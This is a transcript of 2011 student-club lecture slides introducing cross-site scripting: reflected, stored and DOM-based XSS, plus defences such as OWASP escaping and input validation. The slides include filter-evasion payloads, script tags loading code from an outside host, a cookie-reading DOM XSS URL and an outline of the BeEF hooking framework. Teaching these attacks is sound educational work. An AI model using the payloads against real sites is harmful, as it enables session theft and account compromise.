Introduction to XSS attacks - ENSIMAG...Web based vulnerabilities XSS - Cross-Site scripting...
Transcript of Introduction to XSS attacks - ENSIMAG...Web based vulnerabilities XSS - Cross-Site scripting...
Introduction to XSS attacks!
Lecturer: MOUGEY Camille
SecurIMAG
2011-‐10-‐06
WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.
¡¡_ (in)security we trust _!!!
Grenoble INP Ensimag
Summary
• Reflected & Persistent XSS • Principle • Counter-measure • Tools Related
• DOM based XSS/DOMXSS • Principle • Counter-measure
• DOMBased vs. Standard XSS
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Intro
• Cross Site Scripting (XSS) • Malicious scripts injection
• XSS != CSRF
• Often under estimated
• Easy to find, hard to defeat • XSS on bank website, Facebook, Google, …
• Constant evolution • Need standard functions (PHP 5: filter_var())
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Reflected & Persistent XSS
• Reflected & Persistent XSS • Principle • Counter-measure • Tools Related
• DOM based XSS/DOMXSS • Principle • Counter-measure
• DOMBased vs. Standard XSS
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Reflected & Persistent XSS Explanation
• Reflected
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Web based vulnerabilities XSS - Cross-Site scripting
Reflected XSS / type 1 attack
12
12[IBM 2002] Cross-site scriptingFabien Duchene, Karim Hossen (LIG) 5MMSSI-1-Common vulnerabilities and attacks 49/77 2011-2012 49 / 77
• Demo
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Reflected
Reflected & Persistent XSS Explanation
Persistent
Reflected & Persistent XSS Counter-Measure
• Seems, but easy to defeat • In real life: if(preg_match("#<script#is", urldecode($input)) die("FAIL");
-‐> Safe ?
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
<IMG SRC="jav ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-‐IE] [NS8.1-‐G|FF2.0] [O9.02]
<IMG SRC="jav	ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-‐IE] [NS8.1-‐G|FF2.0] [O9.02]
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
Browser support: [IE7.0|IE6.0|NS8.1-‐IE] [NS8.1-‐G|FF2.0] [O9.02]
Browser support: [IE7.0|IE6.0|NS8.1-‐IE] [NS8.1-‐G|FF2.0] [O9.02]
Try ‘< script’ (with a space)
Reflected & Persistent XSS Counter-Measure
• Testing for XSS (blackBox):
• Identify Input
• Analyse HTML Code
• Testing for Stored XSS
• Replay browser trames/request (from logs,…) with an instumented browser
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Reflected & Persistent XSS Counter-Measure
• Client Side • SOP • NoScript
• Bypass method
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
NoScript's default an0-‐xss rules: ^[url]h[p://[/url]([a-‐z]+)\.google\.(?:[a-‐z]{1,3}\.)?[a-‐z]+/(?:search|custom|\1)\?
Try www.google.xss.com …
v 1.6.9.2
v 1.6.9.8 Hold CTRL, and NoScript desapeared ..
Reflected & Persistent XSS Counter-Measure
• Server side • OWASP 8 Rules • RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content
• In general, never trust client Input !
• Have you thought about ‘User-Agent’, ‘Referer’, ‘Accept-Language’, ‘Cookies’, … ?
• HTTPOnly cookie flag
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
RULE #1 & -‐-‐> & < -‐-‐> < > -‐-‐> > " -‐-‐> "
Reflected & Persistent XSS Tools related
• Counter-Measure • Input/Output sanitization: HTMLPurifier
• Stored XSS Finder • Scrubbr • Some homemade script
• Ajax worms
• XSS Exploitation Framework • BeEF
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
BeEF
• Architecture
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
BeEF
• Launch
• Hook
• And you get:
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
BeEF
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
• BeEF Notable feature • Browser exploitation modules • Keystroke logging • Browser proxying • Integration with Metasploit via XML-RPC • Plugin detection • Intranet service exploitation • Tor detection • Browser functionality detection modules
• Demo !
DOM based XSS/DOMXSS
• Reflected & Persistent XSS • Principle • Counter-measure • Tools Related
• DOM based XSS/DOMXSS • Principle • Counter-measure
• DOMBased vs. Standard XSS
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
DOM Based XSS/DOMXSS/type-0 XSS
• DOM (Document Object Model)?
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
<P>
Content
This is a
<B>
paragraph
<P ALIGN="right">This is a <B>paragraph</B></P>
Align
right
DOM Based XSS/DOMXSS/type-0 XSS
• DOM Based XSS principle • Main idea • The web-server does not receive the payload
anymore ! • Detection are usually focus on the server output
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
1
2
3 4
DOMBased Example
• Classic example: <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to our system … </HTML>
• Normal use: http://www.vulnerable.site/welcome.html?name=Fabien
• What about : http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>
• The server see the payload ? Use # • http://www.vulnerable.site/welcome.html?
foobar=name=<script>alert(document.cookie)<script>&name=Fabien
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
DOMBased Counter-Measure
• Traditional methods • HTML encoding output data at the server side • Removing/encoding offending input data at the server
side • Don’t work well on DOMBased !
• 3 main rules • Avoid client side document sensitive actions, using
client side data. Prefer Dynamic pages ! • Analyzing and hardening the client side (Javascript)
code • Use a very strict IPS policy (avoid evasion technique
like double attribut) SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
DOMBased Counter-Measure Back to the Example
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
<SCRIPT> var pos=document.URL.indexOf("name=")+5; var name=document.URL.substring(pos,document.URL.length); if (name.match(/^[a-zA-Z0-9]$/)) { document.write(name); } else { window.alert("Security error"); } </SCRIPT>
DOMBased vs. Standard XSS
• Reflected & Persistent XSS • Principle • Counter-measure • Tools Related
• DOM based XSS/DOMXSS • Principle • Counter-measure
• DOMBased vs. Standard XSS
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
DOMBased vs. Standard XSS
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Standard XSS DOM Based XSS
Root cause Insecure embedding of client input in HTML outbound page
Insecure reference and use (in a client side code) of DOM objects that are not fully controlled by
the server provided page
Page nature Dynamic ONLY Typically sta0c(HTML)
Vulnerability DetecPon
• Manual Fault injec0on • Automa0c Fault Injec0on • Code Review (need access to the page source)
• Manual Fault Injec0on • Code Review (can be done
remotely!)
AQack DetecPon
• Web server logs • Online a[ack detec0on tools (IDS, IPS, web
applica0on firewalls)
If evasion techniques are applicable and used -‐ no server
side detec0on is possible
Counter-‐Measure
• Data valida0on at the server side • A[ack preven0on u0li0es/tools (IPS,
applica0on firewalls)
• Data valida0on at the client side (in Javascript)
• Alterna0ve server side logic
Questions ?
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Source / Bibliography
• Wikipedia: • XSS • DOM
• Berckeley’s University: • An Empirical Analysis of XSS Sanitization in Web
Application Frameworks • MISC n°49 • XSS Cheat Sheet :
• http://ha.ckers.org/xss.html • DOMXSS Wiki:
• https://code.google.com/p/domxsswiki/wiki/Index • DOM Based Cross Site Scripting or XSS of the Third Kind
• http://www.webappsec.org/projects/articles/071105.shtml
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06
Source / Bibliography
• OWASP: • https://www.owasp.org/index.php/
XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet • Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001) • Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002) • Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003) • Scrubbr • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• BeEF: • http://beefproject.com/
• Ajax Worms: • http://www.gnucitizen.org/blog/wormx/ • http://en.wikipedia.org/wiki/Samy_(XSS)
• Mario Heiderich (HIP2k11): • http://heideri.ch
SecurIMAG -‐ Introduc0on to XSS atacks -‐ MOUGEY Camille -‐ 2011-‐10-‐06